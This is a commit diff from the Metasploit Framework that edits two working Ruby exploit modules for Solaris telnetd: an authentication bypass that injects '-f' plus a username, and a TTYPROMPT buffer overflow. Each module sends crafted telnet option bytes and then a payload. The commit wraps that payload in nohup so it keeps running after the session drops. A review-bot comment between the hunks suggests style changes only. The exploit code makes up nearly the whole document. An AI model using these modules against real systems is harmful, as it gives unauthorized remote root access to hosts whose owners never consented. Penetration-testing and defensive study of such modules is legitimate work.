Use nohup to prevent the telnet session close from killing the command
git-svn-id: file:///home/svn/framework3/trunk@8082 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
8399ff46b2
commit
b1f79c6342
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits the argument injection vulnerabilty
|
||||
|
@ -48,13 +48,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 12 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
|
@ -64,27 +64,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
||||
print_status('Setting USER environment variable...')
|
||||
|
||||
|
||||
req = "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB"
|
||||
req << "\x18\xFF\xFB\x1F\xFF\xFB\x20\xFF\xFB\x21\xFF"
|
||||
req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"
|
||||
|
||||
req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
|
||||
|
||||
req << "\xFF\xFC\x25"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
|
||||
req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0"
|
||||
|
||||
req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
|
||||
req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0"
|
||||
req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
|
@ -99,13 +99,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
req << "\x01\x2D\x66" + datastore['USER'] + "\xFF\xF0"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
sock.get_once
|
||||
sleep(0.25)
|
||||
|
||||
sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
|
||||
|
||||
sleep(0.25)
|
||||
|
||||
sock.put(payload.encoded + "\n")
|
||||
sleep(0.25)
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
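Review bot: The new `sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")` line carries no comment, so the reason for the wrapper lives only in the commit message; add `# nohup: the remote shell gets SIGHUP when the telnet session closes, which would kill the payload` above it. As a matter of style, the rest of the file concatenates with `+` and `<<`, but here the redirect suffix is a fixed shell fragment, so `sock.put("nohup #{payload.encoded} >/dev/null 2>&1\n")` reads more clearly; the same line appears in the second module of this commit (the `exploit` hunk at `@@ -81,29 +81,30 @@`) and the comment and interpolation apply there too. The two adjacent `sock.get_once` calls just above the change may be a doubled rendering of one line rather than a genuinely added second read; if it is a second read, a short comment on why the extra response is consumed before the `sleep(0.25)` would help, since the waits are otherwise fixed and undocumented. The `exploit` method begins in the preceding hunk, so only its tail is visible here.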
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,11 +19,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module uses a buffer overflow in the Solaris 'login'
|
||||
application to bypass authentication in the telnet daemon.
|
||||
application to bypass authentication in the telnet daemon.
|
||||
},
|
||||
'Author' => [ 'MC', 'cazz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -49,13 +49,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 18 2002',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
|
@ -65,12 +65,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
||||
banner = sock.get_once
|
||||
|
||||
|
||||
print_status('Setting TTYPROMPT...')
|
||||
|
||||
req =
|
||||
|
||||
req =
|
||||
"\xff\xfc\x18" +
|
||||
"\xff\xfc\x1f" +
|
||||
"\xff\xfc\x21" +
|
||||
|
@ -81,29 +81,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\xff\xfb\x00" +
|
||||
"\xff\xfa\x27\x00" +
|
||||
"\x00TTYPROMPT" +
|
||||
"\x01" +
|
||||
rand_text_alphanumeric(6) +
|
||||
"\xff\xf0"
|
||||
|
||||
"\x01" +
|
||||
rand_text_alphanumeric(6) +
|
||||
"\xff\xf0"
|
||||
|
||||
sock.put(req)
|
||||
sleep(0.25)
|
||||
|
||||
|
||||
print_status('Sending username...')
|
||||
|
||||
|
||||
filler = rand_text_alpha(rand(10) + 1)
|
||||
|
||||
req << datastore['USER'] + (" #{filler}" * 65)
|
||||
|
||||
|
||||
req << datastore['USER'] + (" #{filler}" * 65)
|
||||
|
||||
sock.put(req + "\n\n\n")
|
||||
|
||||
sleep(0.25)
|
||||
sock.get_once
|
||||
|
||||
sock.put(payload.encoded + "\n")
|
||||
|
||||
sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
|
||||
|
||||
sleep(0.25)
|
||||
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|